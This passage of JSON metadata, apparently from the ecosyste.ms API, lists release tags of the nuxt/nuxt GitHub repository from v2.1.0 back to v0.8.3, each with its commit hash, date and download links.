load.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"h